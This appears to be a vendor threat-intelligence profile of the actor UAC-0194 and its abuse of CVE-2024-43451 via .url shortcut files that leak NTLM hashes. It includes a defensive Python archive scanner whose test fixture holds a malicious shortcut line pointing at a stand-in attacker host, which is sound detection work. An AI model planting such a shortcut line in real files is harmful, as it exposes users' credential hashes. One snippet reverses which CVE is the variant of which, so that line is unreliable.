UAC-0194
UAC-0194 is a threat actor cluster assessed in the provided reporting as likely linked to Russia or suspected of having Russian affiliations. The group is associated with cyber operations targeting Ukrainian entities. Reporting links UAC-0194 to in-the-wild weaponization of CVE-2024-43451, a Windows flaw involving malicious Internet Shortcut/.url files that can trigger outbound SMB authentication and expose NTLM/NTLMv2 hashes with minimal user interaction. The activity described includes phishing campaigns themed around renewal of academic certificates, including ZIP archives containing a benign-looking diploma PDF and a malicious URL file, and use of files hosted on an official Ukrainian government site related to academic certificates. CERT-UA technical information cited in the content indicates the exploit was part of a broader campaign aimed at Ukrainian entities. ClearSky assessed the activity as likely linked to UAC-0194 and reported infrastructure tied to a Russian VPS provider. The same exploitation chain was reported as being used to distribute SparkRAT and later Redline Stealer. Additional reporting in the content states that CVE-2024-43451 first emerged in a cyberattack operation launched by UAC-0194 against Ukraine, and that later variant exploitation of related NTLM hash disclosure issues referenced UAC-0194 as a prior actor linked to this tradecraft. No aliases beyond the identical form "uac_0194" are provided in the content.
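As an added example (not code from the page, from CERT-UA or from ClearSky), the following Python triage script implements the defender-side check this summary implies: open a ZIP archive, locate Internet Shortcut (.url) entries, and flag any whose path-bearing fields point at a remote host, since a remote UNC or file:// reference is what makes Windows initiate outbound SMB authentication. The sample archive, the placeholder host `attacker.invalid`, and the choice of fields to inspect (`URL`, `IconFile`, `WorkingDirectory`) are constructed assumptions for the demonstration, not indicators or details taken from the reporting.

```python
import configparser
import io
import re
import zipfile
from typing import Dict, List, Optional

# Constructed sample .url contents mimicking the lure pattern described in the
# reporting (a diploma PDF bundled with a shortcut that points at a remote host).
# The host name is a placeholder, not an indicator from any report.
SUSPICIOUS_URL_FILE = """[InternetShortcut]
URL=https://example.invalid/diploma
IconFile=\\\\attacker.invalid\\share\\icon.ico
IconIndex=0
"""

BENIGN_URL_FILE = """[InternetShortcut]
URL=https://example.invalid/docs
IconFile=C:\\Windows\\System32\\shell32.dll
IconIndex=13
"""

# Shortcut fields that can carry a path Windows will resolve (assumed list).
PATH_FIELDS = ("URL", "IconFile", "WorkingDirectory")

# A UNC path (\\host\share) or a file:// URL with a non-empty host both make the
# shell contact a remote server; loopback and empty hosts are treated as local.
UNC_RE = re.compile(r"^\\\\([^\\\s]+)\\", re.IGNORECASE)
FILE_URL_RE = re.compile(r"^file://([^/\\\s]+)[/\\]", re.IGNORECASE)
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


def remote_host(value: str) -> Optional[str]:
    """Return the remote host a shortcut field points at, or None if it is local."""
    value = value.strip()
    match = UNC_RE.match(value) or FILE_URL_RE.match(value)
    if not match:
        return None
    host = match.group(1).lower()
    return None if host in LOCAL_HOSTS else host


def inspect_url_file(text: str) -> Dict[str, str]:
    """Parse a .url file (INI syntax) and return {field: remote_host} for every
    inspected field that references a remote host. An empty dict means nothing
    suspicious was found; an unparseable file is reported under 'parse_error'."""
    parser = configparser.RawConfigParser(strict=False, delimiters=("=",),
                                          interpolation=None)
    try:
        parser.read_string(text)
    except configparser.Error as exc:
        return {"parse_error": f"unparseable shortcut: {exc.__class__.__name__}"}
    findings: Dict[str, str] = {}
    for section in parser.sections():
        for field in PATH_FIELDS:
            # has_option/get apply optionxform, so field-name case does not matter.
            if parser.has_option(section, field):
                host = remote_host(parser.get(section, field))
                if host:
                    findings[field] = host
    return findings


def scan_archive(zip_bytes: bytes) -> List[dict]:
    """Open a ZIP in memory and report every .url entry with its remote-host
    findings and whether a document lure (PDF/DOCX) sits beside it."""
    results = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = zf.namelist()
        has_doc_lure = any(n.lower().endswith((".pdf", ".docx")) for n in names)
        for name in names:
            if not name.lower().endswith(".url"):
                continue
            text = zf.read(name).decode("utf-8", errors="replace")
            findings = inspect_url_file(text)
            results.append({
                "name": name,
                "remote_refs": findings,
                "bundled_with_document": has_doc_lure,
                "verdict": "suspicious" if findings else "clean",
            })
    return results


def build_sample_archive() -> bytes:
    """Constructed archive mirroring the lure: a PDF placeholder plus .url files."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("diploma.pdf", b"%PDF-1.4\n% placeholder, not a real document\n")
        zf.writestr("diploma.url", SUSPICIOUS_URL_FILE)
        zf.writestr("readme.url", BENIGN_URL_FILE)
    return buf.getvalue()


if __name__ == "__main__":
    for result in scan_archive(build_sample_archive()):
        print(result)
```

The script only flags shortcut fields that would cause a remote lookup, so locally referenced icons such as `shell32.dll` are reported as clean, while an unparseable shortcut is also surfaced for review rather than silently skipped. In a mail-gateway or sandbox pipeline the same check would run over every attachment before delivery, and a `.url` entry bundled beside a document lure is the combination the reporting describes.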
Know when an actor pivots toward your sector
Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.
Associated malware families
2 malware families attributed to this actor across reporting.
Associated vulnerabilities
2 CVEs this actor has used in observed campaigns. 2 of them exploited in the wild.
ClearSky Cyber Security has uncovered a new zero-day vulnerability, CVE-2024-43451, actively exploited in the wild, targeting Windows systems primarily in Ukraine. This flaw enables attackers to exploit URL files for malicious activity by performing actions as simple as a single right-click.
A recently patched security flaw affecting Windows NTLM has been exploited by malicious actors to leak NTLM hashes or user passwords and infiltrate systems since March 19, 2025. The flaw, CVE-2025-24054 (CVSS score: 6.5), is a hash disclosure spoofing bug that was fixed by Microsoft last month as part of its Patch Tuesday updates. The security flaw is assessed to be a variant of CVE-2024-43451 (CVSS score: 6.5), which was patched by Microsoft in November 2024 and has also been weaponized in the wild in attacks targeting Ukraine and Colombia by threat actors like UAC-0194 and Blind Eagle.
Observables
2 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting. View more in app.
Recent activity
5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Associated with early use of CVE-2024-43451 in operations against Ukraine (as referenced for provenance of the vulnerability’s observed exploitation).
UAC-0194 is known for exploiting Windows NTLM vulnerabilities, specifically CVE-2025-24054 and its variant CVE-2024-43451, to leak NTLM hashes or user passwords and infiltrate systems. They have targeted Ukraine and Colombia.
Referenced as a threat actor that has weaponized CVE-2024-43451 in real-world attacks, targeting Ukraine and Colombia.
Mentioned as a Russian APT group previously linked to exploitation of CVE-2024-43451 via a .url file; in this reporting, that technique/file is reused alongside CVE-2025-24054 exploitation artifacts.
The version that knows your environment.
Match sector + geo + tech-stack targeting against your real footprint.
Every observed MITRE ATT&CK technique, grouped by tactic.
Families this actor is known to deploy, with IOCs and behavior.
CVEs this actor has used in known campaigns.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Domains, IPs, and hashes tied to this actor, refreshed continuously.